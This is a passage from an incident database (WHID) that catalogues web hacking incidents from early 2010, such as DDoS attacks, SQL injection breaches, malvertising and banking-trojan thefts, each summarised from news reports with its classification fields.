Incident Description: The New York City-based spokesman for Kwame Kilpatrick complained this afternoon that www.friendsofkwame.com is not working properly, and he suspects hackers. Mike Paul said he is investigating the matter seriously and will pursue prosecution if the site he is promoting on Kwame Kilpatrick’s behalf indeed has been tampered with by outsiders.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.freep.com/article/20100505/NEWS01/100505073/1322/Kilpatricks-site-down-spokesman-suspects-hackers
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-76: Website hacked, election officials say
WHID ID: 2010-76
Date Occured: 5/5/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description: Local elections officials say their website was hacked as they tried to communicate the results of the Tuesday, May 4, primary election — crashing the site several times and delaying the announcement of vote tallies. “We have crashed three servers, and in examining those servers, there are two unidentified sites that are deliberately diverting traffic,” said Butler County Board of Elections Director Betty McGary as her frenzied staff struggled to post election results. “Our servers are under attack, we feel,” McGary said, stressing that the problem pertained only to transmitting totals to the public, not accurately counting the votes.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.middletownjournal.com/news/election/website-hacked-election-officials-say-687529.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-75: Russian-born hacker selling 1.5m Facebook usernames
WHID ID: 2010-75
Date Occured: 4/24/2010
Attack Method: Stolen Credentials
Application Weakness: Unknown
Outcome: Session Hijacking
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: A RUSSIAN-born hacker is attempting to sell Facebook IDs for as little as $25 per 100 usernames, social-media blog Mashable reports, citing researchers at VeriSign's iDefense. The hacker, who calls himself Kirllos, has obtained 1.5 million Facebook IDs, or one for every 300 people who use the social networking website.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.news.com.au/technology/russian-born-hacker-selling-15m-facebook-usernames/story-e6frfro0-1225857706897
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-74: Another Zimbabwe news website attacked by hackers
WHID ID: 2010-74
Date Occured: 4/24/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: Zimbabwe
Incident Description: London(ZimEye) Another Zimbabwe news website, the ZimDiaspora has been hacked by online criminals. As at Saturday, the website was no longer functioning and one of the editors speaking to ZimEye Saturday said that neither he nor the Hosting company were able to restore the site at the moment. Despite the hosting company’s apparent desperation Saturday, ZimEye was able to trace the notorious hackers to a location in the Indonesian town of Bandug. The hackers specialise in hacking websites made by the Joomlah software on which the Zimdiaspora is built. They have also declared it openly that this is their field of speciality.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.zimeye.org/?p=16521
Attack Source Geography: Indonesia
Attacked System Technology: Joomla
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-73: Report: Music insider site source of leaked songs
WHID ID: 2010-73
Date Occured: 4/23/2010
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Monetary Loss
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description: As if the record industry hasn't tasted enough bitter irony lately, a bunch of album leaks over the weekend apparently came from a service used by music labels to share files with radio stations, media, and other trusted insiders. According to a post on AbsolutePunk, somebody signed up for an account with Play MPE under false pretenses, claiming to be an Australian music critic. Then this person--apparently a teenage boy--figured out how to access music he wasn't entitled to, including upcoming releases by The Black Keys, Macy Gray, Hole, The Gaslight Anthem, and many other artists. The AbsolutePunk story referred to this kid as a hacker, but looking at his self-described exploits, that term might be a little too strong. It's not as if he did any sophisticated DRM cracking. Rather, he noticed that that the URL in the Web-based download file had the characters "songid=" followed by a bunch of numbers. By changing the numbers, he was apparently able to to get other song downloads that he wasn't supposed to see.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-13526_3-20003331-27.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-72: Blippy users’ credit card numbers found on Google
WHID ID: 2010-72
Date Occured: 4/23/2010
Attack Method: Unintentional Information Disclosure
Application Weakness: Insecure Indexing
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: Yesterday was a big day for social-oversharing site Blippy, which lets members automatically post their purchases to the Internet. The company announced $11.2 million in funding and was profiled in The New York Times. Overnight, at least one Internet power user figured out a way to search for Blippy members’ credit card numbers on Google. A fairly obvious search for “from card” this morning returned 127 results that included full credit card numbers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://venturebeat.com/2010/04/23/blippy-credit-card-citibank/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-71: Fire Alarm Company Burned by e-Banking Fraud
WHID ID: 2010-71
Date Occured: 4/7/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description: A fire alarm company in Arkansas lost more than $110,000 this month when hackers stole the firm’s online banking credentials and drained its payroll account.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/04/fire-alarm-company-burned-by-e-banking-fraud/
Attack Source Geography:
Attacked System Technology:
Cost: $110000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-70: Armenian websites attacked Turkish hackers
WHID ID: 2010-70
Date Occured: 4/12/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Government
Attacked Entity Geography: Armenia
Incident Description: Turkish hackers have attacked several Armenian websites ahead of annual commemorative remembrances of the Armenian Genocide. On April 12th, more than 250 sites were impacted when cyber terrorists attacked a server hosting sites including www.ArmeniaChat.com, www.ArmeniaSearch.com according to the owner of the sites (who wishes to remain anonymous), ANCA Communications Director Elizabeth Chouljian told PanARMENIAN.Net The attackers also took down www.armenian.com, which is the website for Armenian Directory Yellow pages. Attackers attempted to hack into a second server which hosts www.ArmGate.com but were unsuccessful. All the websites attacked were offline for a period of two days due to the damage caused by the attack.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.panarmenian.net/eng/it_telecom/news/47183/
Attack Source Geography: Turkey
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-69: Walmart web site hacked and hosting spam
WHID ID: 2010-69
Date Occured: 4/15/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Link Spam
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: One of Walmart official web sites, www.walmartcommunity.com (for their Community Action Network) has SPAM links. The attackers probably injected the spam in one of their templates files. After a bit of search, we found all of them inside the footer.php
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.sucuri.net/2010/04/walmart-web-site-hacked-and-hosting.html
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-68: Daily Telegraph website hacked
WHID ID: 2010-68
Date Occured: 4/15/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography: United Kingdom
Incident Description: Part of the Daily Telegraph's website has been hacked, apparently by people in Romania who were aggrieved at its identification of "gypsies" and "Romanians". Its "Short Breaks" and Wine And Dine sections were both hacked, with the Short Breaks site still up at 12.55pm today, with a picture of a Romanian flag claiming to be for the "Romanian National Security", some comments in Romanian and the remark in English at the bottom that "Guess what, gypsies aren't romanians, morons." It also links to a Russian site which plays an MP3 called The Lonely Shepherd. Sunbelt Software, which first noticed the hack, said that it had alerted the Telegraph when it noticed the hack. The method used to hack into the site is not known.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.guardian.co.uk/media/2010/apr/15/daily-telegraph-hacking
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-67: Apache.org hit by targeted XSS attack, passwords compromised
WHID ID: 2010-67
Date Occured: 4/9/2010
Attack Method: Brute Force
Application Weakness: Improper Output Handling
Outcome: Session Hijacking
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description: On April 5th, the attackers via a compromised Slicehost server opened a new issue, INFRA-2591. This issue contained the following text: ive got this error while browsing some projects in jira http://tinyurl.com/XXXXXXXXX [obscured] Tinyurl is a URL redirection and shortening tool. This specific URL redirected back to the Apache instance of JIRA, at a special URL containing a cross site scripting (XSS) attack. The attack was crafted to steal the session cookie from the user logged-in to JIRA. When this issue was opened against the Infrastructure team, several of our administators clicked on the link. This compromised their sessions, including their JIRA administrator rights.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.zdnet.com/security/?p=6123&tag=nl.e539
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-66: Ads to blame for malware in Facebook's FarmTown?
WHID ID: 2010-66
Date Occured: 4/12/2010
Attack Method: Malvertising
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: The 9.6 million players of the Facebook game FarmTown are being warned about fake security warnings popping up that are designed to mislead people into paying for antivirus protection they don't need. "We are aware and have reported to the developers that many of our players have encountered the malware/spyware while on the FarmTown Site," the moderator of a user forum for FarmTown maker SlashKey warned over the weekend. "We believe at this time that it is harmless to your computer and a result of one or more of the ads on the site, but you should NOT follow any links to any software claiming to 'clean your system.'" Sophos' Graham Cluley said it appeared that third-party advertising displayed underneath the FarmTown playing window is to blame. "In all likelihood, hackers have managed to poison some of the adverts that are being served to FarmTown by the outside advert provider," Cluley wrote on his blog.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-27080_3-20002267-245.html
Attack Source Geography:
Attacked System Technology: Facebook
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-65: NewsBusters Knocked Offline
WHID ID: 2010-65
Date Occured: 4/9/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: A deliberate brute force attack, a criminal act, knocked NewsBusters offline since late Friday morning. More information to come, but now we’re back and we thank you for bearing with us as our tech team worked studiously to restore the site. Read more: http://newsbusters.org/?q=blogs/nb-staff/2010/04/10/newsbusters-back-here-s-some-what-you-ve-missed#ixzz0kuulCcnh
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://newsbusters.org/?q=blogs/nb-staff/2010/04/10/newsbusters-back-here-s-some-what-you-ve-missed
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-64: Hundreds of Wordpress Blogs Hit by ‘Networkads.net’ Hack
WHID ID: 2010-64
Date Occured: 4/9/2010
Attack Method: Predictable Resource Location
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Blogs
Attacked Entity Geography:
Incident Description: A large number of bloggers using Wordpress are reporting that their sites recently were hacked and are redirecting visitors to a page that tries to install malicious software. According to multiple postings on the Wordpress user forum and other blogs, the attack doesn’t modify or create files, but rather appears to inject a Web address — “networkads.net/grep” — directly into the target site’s database, so that any attempts to access the hacked site redirects the visitor to networkads.net. Worse yet, because of the way the attack is carried out, victim site owners are at least temporarily locked out of accessing their blogs from the Wordpress interface. It’s not clear yet whether the point of compromise is a Wordpress vulnerability (users of the latest, patched version appear to be most affected), a malicious Wordpress plugin, or if a common service provider may be the culprit. However, nearly every site owner affected so far reports that Network Solutions is their current Web hosting provider.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://krebsonsecurity.com/2010/04/hundreds-of-wordpress-blogs-hit-by-networkads-net-hack/
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-63: Police cuff 70 eBay fraud suspects
WHID ID: 2010-63
Date Occured: 4/6/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Fraud
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: Romanian police have arrested 70 suspected cybercrooks, thought to be members of three gangs which allegedly used compromised eBay accounts to run scams. The alleged fraudsters obtained login credentials using phishing scams before using these trusted profiles to tout auctions for non-existent luxury goods (luxury cars, Rolex watches and even a recreational aircraft). Buyers handed over the loot but never received any goods in return.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/04/07/romania_cybercrime_bust/
Attack Source Geography: Romania
Attacked System Technology: eBay
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-62: Computer Crooks Steal $100,000 from Ill. Town
WHID ID: 2010-62
Date Occured: 3/11/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Illinois, USA
Incident Description: A rash of home foreclosures and abandoned dwellings had already taken its toll on the tax revenue for the Village of Summit, a town of 10,000 just outside Chicago. Then, in March, computer crooks broke into the town’s online bank account, making off with nearly $100,000. According to Rivera, the theft took place Mar. 11, when her assistant went to log in to the town’s account at Bridgeview Bank. When the assistant submitted the credentials to the bank’s site, she was redirected to a page telling her that the bank’s site was experiencing technical difficulties. What she couldn’t have known was that the thieves were stalling her so that they could use the credentials she’d supplied to create their own interactive session with the town’s bank account.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/04/computer-crooks-steal-100000-from-ill-town/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-61: How Chinese Hackers Exploit Twitter, Google and Yahoo
WHID ID: 2010-61
Date Occured: 4/6/2010
Attack Method: Abuse of Functionality
Application Weakness: Abuse of Functionality
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography:
Incident Description: A stunning new report issued last night by a team of U.S. and Canadian researchers highlights a critical development in the world of cyber crime: the use of popular services like Twitter, Google (GOOG) and Yahoo (YHOO) to camouflage and carry out infiltrations at the highest level of international government and business.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blogs.bnet.com/business-news/?p=856
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://www.scribd.com/doc/29435784/SHADOWS-IN-THE-CLOUD-Investigating-Cyber-Espionage-2-0
Entry Title: WHID 2010-60: CNN redirect exploited by scammers
WHID ID: 2010-60
Date Occured: 4/6/2010
Attack Method: Redirection
Application Weakness: Improper Input Handling
Outcome: Link Spam
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: SPAMMERs use an Open Redirection vuln in a CNN ad site. The clever touch was providing a link that exploits redirect functionality supported by CNN’s ad servers. The link is structured as follows: http://ads.cnn.com/event.ng/Type=click&Redirect=http:/bit.ly/cP–XW Clicking on the link sends a request to CNN which instructs the browser to send a second request to the redirect URL – in this case the shortened http:/bit.ly/cP—XW. The host site would not be aware of the misuse – the spammer is simply abusing legitimate ad-serving functionality. This technique provides several advantages to the spammer: 1) The URL from cnn.com might give the impression that there was a genuine CNN-worthy story to be found 2) The reputable site name would allay fears of anything malicious lurking at the end of the click. 3) Most URL filtering solutions would not block the initial request to cnn.com (although reputable solutions would have been updated in real time about the follow on link which would be blocked)
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://blog.commtouch.com/cafe/email-security-news/cnn-redirect-exploited-by-scammers/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+CommtouchCafe+(Commtouch+Café)
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-59: Orange Regional Website Hacked
WHID ID: 2010-59
Date Occured: 2/9/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Information Services
Attacked Entity Geography: Ivory Coast
Incident Description: A Lebanese hacker claims to have hacked Orange's regional website in Cote d'Ivoire (Ivory Coast) through SQL injection. The attack allegedly gave him access to the website's administration interface and information on almost 60,000 customers.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.softpedia.com/news/Orange-Regional-Website-Hacked-134467.shtml
Attack Source Geography: Lebanon
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 60000
Additional Link:
Entry Title: WHID 2010-58: China journalist club shuts website after attack
WHID ID: 2010-58
Date Occured: 4/1/2010
Attack Method: Unknown
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Media
Attacked Entity Geography: China
Incident Description: The Foreign Correspondents Club of China said on Friday it had shut its website after a burst of hacker attacks, days after attacks on the Yahoo email accounts of some foreign journalists covering China were discovered. "We do not know who is behind the attacks or what their motivation is," the club's board said in an emailed statement explaining it had decided to shut down temporarily the site after two days of "persistent" attacks. The club has traced the online assault to IP addresses in both China and the U.S., but added that these machines could have been taken over by hackers in other locations. The hacking was the latest of several recent incidents that have brought to light the Internet vulnerabilities of people or groups whose work may raise hackles in China.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.reuters.com/assets/print?aid=USTOE63101R20100402
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-57: Web security under attack from ads in prominent advertising programs
WHID ID: 2010-57
Date Occured: 3/31/2010
Attack Method: Malvertising
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Information Services
Attacked Entity Geography: USA
Incident Description: Advertisement programs operated by Google, Yahoo and Fox were recently found to deliver malware, according to CNET. Avast, the Czech Republic-based web security company, discovered the malware and stated that this particular strain target holes in popular web browsers such as Firefox and Internet Explorer. Yahoo's Yield Manager and Fox FirmServe manage nearly 50 percent of all online ads. Google's program DoubleClick was found to contain some malvertisements, but not to the extent of Yield Manager or FirmServe. Other advertising platforms like Facebook and MySpace have also experienced similar problems in recent months.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.mxlogic.com/securitynews/web-security/web-security-under-attack-from-ads-in-prominent-advertising-programs651.cfm
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-56: Facebook Flub Leaks Private E-Mail Addresses
WHID ID: 2010-56
Date Occured: 3/31/2010
Attack Method: Misconfiguration
Application Weakness: Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description: Private e-mail addresses that many Facebook users wanted to keep hidden were revealed publicly last night on a multitude of Facebook profiles, Gawker reports. The glitch lasted about 30 minutes before Facebook sealed the gap. It might be that Facebook's recently proposed changes to its privacy settings could be to blame for the hiccup. PC World writer Paul Suarez reported that "One of those changes [to Facebook's Privacy Policy and Statement of Rights and Responsibilities] would make it possible for Facebook to send your name, photo, friend list, and any public information about you and your friends to preapproved third-party Web sites." A slight tweak to broadcasting profile information could have resulted in this embarrassing flub.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.cio.com/article/589021/Facebook_Flub_Leaks_Private_E_Mail_Addresses
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-55: Drudge Report accused of serving malware, again
WHID ID: 2010-55
Date Occured: 3/9/2010
Attack Method: Malvertising
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description: For the second time in less than six months, visitors to the Drudge Report say they got malware in addition to the Web site's usual sensational headlines. Matt Drudge denied that his site was infecting visitors, however it's likely that the malware is coming from ads delivered by a third-party ad network and not the site itself.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.cnet.com/8301-27080_3-10466044-245.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-54: MyPilotStore.com hack results in false charges on customers’ cards
WHID ID: 2010-54
Date Occured: 2/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: On February 18, MyPlane, dba MyPilotStore.com, discovered that their database containing their customers’ names, addresses, telephone numbers, e-mail addresses, and credit card information had been hacked. According to the firm, some customers received a “nominal fake charge to their credit card by a company not associated with us.”
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.databreaches.net/?p=10990
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-53: Google says Vietnam political blogs hacked
WHID ID: 2010-53
Date Occured: 3/31/2010
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Web 2.0
Attacked Entity Geography: Vietnam
Incident Description: Internet giant Google says Vietnamese computer users have been spied on and political blogs hacked in attacks which a leading web security firm suspects are linked to the Vietnamese government. The incidents recall cyber attacks in China that Google in January said had struck it and other unidentified firms in an apparent bid to hack into the email accounts of Chinese human rights activists. "These infected machines have been used both to spy on their owners as well as participate in distributed denial of service attacks against blogs containing messages of political dissent," said Neel Mehta of Google's security team in the firm's Online Security Blog.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://news.yahoo.com/s/afp/20100331/tc_afp/vietnammediainternetrightsgooglemcafee&a=Technology%20News&x=1
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-52: 3000 Small Dog Electronics customers' credit card details compromised
WHID ID: 2010-52
Date Occured: 2/18/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: lectronics retailer Small Dog Electronics has suffered from a systems breach that left 3000 customers' credit card details compromised. The data theft, which left the credit card details exposed from late December to almost the end of January, used a security hole in the in-house web application that had been developed to manage Smalldog's ecommerce system. Don Mayer, CEO of Small Dog Electronics, explained that the company is PCI compliant, and that it had been subjected to a penetration test by a third party, which he would not name. The flaw in the code has now been rectified, and Small Dog is investigating the issue with the pen tester, added Mayer, who did not know what language the ecommerce system had been written in.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.infosecurity-us.com/view/7411/3000-small-dog-electronics-customers-credit-card-details-compromised/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 3000
Additional Link:
Entry Title: WHID 2010-51: Woman worms into D.C. taxpayer accounts
WHID ID: 2010-51
Date Occured: 2/5/2010
Attack Method: Abuse of Functionality
Application Weakness: Insufficient Process Validation
Outcome: Leakage of Information
Attacked Entity Field: Government
Attacked Entity Geography: Washington DC, USA
Incident Description: A mentally ill woman exploited a loophole in D.C. tax office online systems to gain unauthorized access to taxpayer accounts, establish herself as the owner of dozens of businesses and file returns on their behalf. The FR-500 forms were not submitted for review before processing, BDO found, and no verification checks were performed. The loophole was a glitch, OTR explained. The agency's Integrated Tax System was supposed to deny ownership changes requested through the FR-500 function, but "faulty logic" allowed the updates automatically. Umansky said a fix is now in place and "that can't happen again."
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.washingtonexaminer.com/local/Woman-worms-into-D_C_-taxpayer-accounts-83589257.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-50: Shared-password vulnerability may have exposed personal information in online account management system
WHID ID: 2010-50
Date Occured: 1/14/2010
Attack Method: Stolen Credentials
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description: Lincoln National Corp. (LNC) last week disclosed a security vulnerability in its portfolio information system that could have compromised the account data of approximately 1.2 million customers. In a disclosure letter (PDF) sent to the attorney general of New Hampshire Jan. 4, attorneys for the financial services firm revealed that a breach of the Lincoln portfolio information system had been reported to the Financial Industry Regulatory Authority (FINRA) by an unidentified source last August. The company was planning to issue notification to the affected customers on Jan. 6, the letter says. The letter does not give technical details about the breach, but it indicates the unidentified source sent FINRA a username and password to the portfolio management system.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 1200000
Additional Link:
Entry Title: WHID 2010-49: Hackers pluck 8,300 customer logins from bank server
WHID ID: 2010-49
Date Occured: 1/12/2010
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: NY, USA
Incident Description: Hackers have stolen the login credentials for more than 8,300 customers of small New York bank after breaching its security and accessing a server that hosted its online banking system. The intrusion at Suffolk County National Bank happened over a six-day period that started on November 18, according to a release (PDF) issued Monday. It was discovered on December 24 during an internal security review. In all, credentials for 8,378 online accounts were pilfered, a number that represents less than 10 percent of SCNB's total customer base.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.theregister.co.uk/2010/01/12/bank_server_breached/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 8300
Additional Link:
Entry Title: WHID 2010-48: Hackers brute force their way into galeton.com website containing names, credit card numbers
WHID ID: 2010-48
Date Occured: 2/8/2010
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: Hackers used brute force to log into web accounts of users at www.galeton.com.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://datalossdb.org/incidents/2692-hackers-brute-force-their-way-into-website-containing-names-credit-card-numbers
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-47: Court papers: JC Penney was hacking victim
WHID ID: 2010-47
Date Occured: 10/23/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description: JC Penney Co. was one of the victims of notorious computer hacker Albert Gonzalez, according to unsealed documents made available on Monday by a federal judge in Boston. Penney, which during Gonzalez' trial had asked the U.S. District Court for the District of Massachusetts to bar the government from disclosing its identity, was revealed in the documents to be the company that had been known throughout the trial as "Company A." ICQ chat logs confirm SQL Injection was used - http://datalossdb.org/system/jcp_attachment.pdf
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.msnbc.msn.com/id/36088614/ns/technology_and_science-security/
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://datalossdb.org/incident_highlights/48
Entry Title: WHID 2010-46: Microsoft's Larry "Major Nelson" Hryb has online account hijacked through Xbox.com as part of underground group's publicity bid.
WHID ID: 2010-46
Date Occured: 3/29/2010
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description: Xbox Live director of programming Larry Hryb has for some time now been the face of Microsoft's online platform for the Xbox 360, thanks in large part to his Major Nelson persona. Unfortunately, Xbox Live's figurehead saw his gamertag defaced over the weekend after a hacker was able to log into Hryb's account.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.gamespot.com/news/6254330.html
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-45: Online Thieves Take $205,000 Bite Out of Missouri Dental Practice
WHID ID: 2010-45
Date Occured: 3/30/2010
Attack Method: Banking Trojan
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: Missouri, USA
Incident Description: Organized computer criminals yanked more than $200,000 out of the online bank accounts of a Missouri dental practice this month, in yet another attack that exposes the financial risks that small- to mid-sized organizations face when banking online. Smile Zone is still investigating how the thieves compromised the account. But in case after case I’ve reported on involving this type of fraud, the attackers hacked the victim’s computer networks using a Trojan horse program known as Zeus or Zbot, which allows the criminals to tunnel back through the victim’s PC in order to log into the target account without raising red flags or additional security mechanisms.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.krebsonsecurity.com/2010/03/online-thieves-take-205000-bite-out-of-missouri-dental-practice/
Attack Source Geography:
Attacked System Technology:
Cost: $205000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2010-44: Baidu hacked by Iranian Cyber Army
WHID ID: 2010-44
Date Occured: 1/12/2010
Attack Method: Weak Password Recovery Validation
Application Weakness: Insufficient Process Validation
Outcome: Downtime
Attacked Entity Field: Internet
Attacked Entity Geography: China
